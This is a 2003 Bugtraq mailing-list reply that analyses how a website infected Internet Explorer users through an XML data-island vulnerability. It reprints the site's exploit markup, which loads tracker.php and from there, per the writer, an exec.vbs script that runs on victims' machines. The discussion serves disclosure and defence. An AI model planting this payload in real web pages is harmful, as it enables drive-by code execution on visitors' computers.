Home page logo
/

bugtraq logo Bugtraq mailing list archives

RE: [Fwd: Re: AIM Password theft]
From: S G Masood <sgmasood () yahoo com>
Date: Tue, 23 Sep 2003 15:50:23 -0700 (PDT)

Hi Mark,

www.Haxr.org uses the "XML Page Object Type Validation
Vulnerability" [1] to infect IE users automatically.
Here is the code from the site:


<span datasrc="#oExec" datafld="counter"
dataformatas="html"></span>
<xml id="oExec">
<security>
<counter>
<![CDATA[
<object data=tracker.php></object>
]]>
</counter>
</security>
</xml>

This is almost an exact copy of the PoC exploit posted
for this vuln.

tracker.php points to the exec.vbs script that you
posted. This finally gets executed on the victim
machine and does its stuff.

If this is new, its going to spread like wildfire. 

It will infect many machines but IMO, it wouldn't
exactly spread like "wildfire" 'coz it has a "single
point of failure". Have you considered complaining to
the hosting service of www.haxr.org?


--
Regards,
S.G.Masood

Hyderabad,
India
--

__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]